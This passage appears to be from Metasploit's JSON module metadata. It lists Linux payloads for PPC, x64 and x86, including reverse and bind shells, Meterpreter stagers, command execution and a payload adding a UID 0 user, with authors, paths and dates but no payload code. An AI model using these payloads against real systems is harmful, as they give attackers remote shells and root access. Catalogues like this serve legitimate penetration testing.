"path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/ppc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc, cbea",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/ppc64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/ppc64/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/ppc64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "ppc64, cbea64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppc64le/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppc64le/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppc64le",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/ppce500v2/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/ppce500v2/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "ppce500v2",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/exec.rb",
"is_install_path": true,
"ref_name": "linux/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter/bind_tcp": {
"name": "Linux Mettle x64, Bind TCP Stager",
"full_name": "payload/linux/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Brent Cook <bcook@rapid7.com>",
"ricky"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter/reverse_tcp": {
"name": "Linux Mettle x64, Reverse TCP Stager",
"full_name": "payload/linux/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Brent Cook <bcook@rapid7.com>",
"ricky",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 16:30:19 +0000",
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell/bind_tcp": {
"name": "Linux Command Shell, Bind TCP Stager",
"full_name": "payload/linux/x64/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell/reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Stager",
"full_name": "payload/linux/x64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky",
"tkmru"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-05 16:30:19 +0000",
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_ipv6_tcp": {
"name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/linux/x64/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"epi <epibar052@gmail.com>"
],
"description": "Listen for an IPv6 connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-14 16:32:19 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_tcp": {
"name": "Linux Command Shell, Bind TCP Inline",
"full_name": "payload/linux/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_bind_tcp_random_port": {
"name": "Linux Command Shell, Bind TCP Random Port Inline",
"full_name": "payload/linux/x64/shell_bind_tcp_random_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Geyslan G. Bem <geyslan@gmail.com>"
],
"description": "Listen for a connection on a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_tcp_random_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_find_port": {
"name": "Linux Command Shell, Find Port Inline",
"full_name": "payload/linux/x64/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mak"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_find_port.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_reverse_ipv6_tcp": {
"name": "Linux x64 Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/linux/x64/shell_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"epi <epibar052@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-06 20:18:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x64/shell_reverse_tcp": {
"name": "Linux Command Shell, Reverse TCP Inline",
"full_name": "payload/linux/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"ricky"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Linux",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/adduser": {
"name": "Linux Add User",
"full_name": "payload/linux/x86/adduser",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"spoonm <spoonm@no$email.com>"
],
"description": "Create a new user with UID 0",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/adduser.rb",
"is_install_path": true,
"ref_name": "linux/x86/adduser",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_linux/x86/chmod": {
"name": "Linux Chmod",
"full_name": "payload/linux/x86/chmod",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Runs chmod on specified file with specified mode",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/chmod.rb",
"is_install_path": true,
"ref_name": "linux/x86/chmod",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/exec": {
"name": "Linux Execute Command",
"full_name": "payload/linux/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/linux/x86/exec.rb",
"is_install_path": true,
"ref_name": "linux/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_ipv6_tcp": {
"name": "Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>"
],
"description": "Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_ipv6_tcp_uuid": {
"name": "Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_nonx_tcp": {
"name": "Linux Mettle x86, Bind TCP Stager",
"full_name": "payload/linux/x86/meterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_tcp": {
"name": "Linux Mettle x86, Bind TCP Stager (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>"
],
"description": "Inject the mettle server payload (staged). Listen for a connection (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/bind_tcp_uuid": {
"name": "Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)",
"full_name": "payload/linux/x86/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/find_tag": {
"name": "Linux Mettle x86, Find Tag Stager",
"full_name": "payload/linux/x86/meterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Use an established connection",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_ipv6_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager (IPv6)",
"full_name": "payload/linux/x86/meterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Inject the mettle server payload (staged). Connect back to attacker over IPv6",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_nonx_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_tcp": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"tkmru"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter/reverse_tcp_uuid": {
"name": "Linux Mettle x86, Reverse TCP Stager",
"full_name": "payload/linux/x86/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"William Webb <william_webb@rapid7.com>",
"skape <mmiller@hick.org>",
"egypt <egypt@metasploit.com>",
"OJ Reeves"
],
"description": "Inject the mettle server payload (staged). Connect back to the attacker",
"references": [
],
"platform": "Linux,Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-08-15 08:02:51 +0000",
"path": "/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_http": {
"name": "Linux Meterpreter, Reverse HTTP Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_https": {
"name": "Linux Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Linux",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/x86/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_linux/x86/meterpreter_reverse_tcp": {
"name": "Linux Meterpreter, Reverse TCP Inline",
"full_name": "payload/linux/x86/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
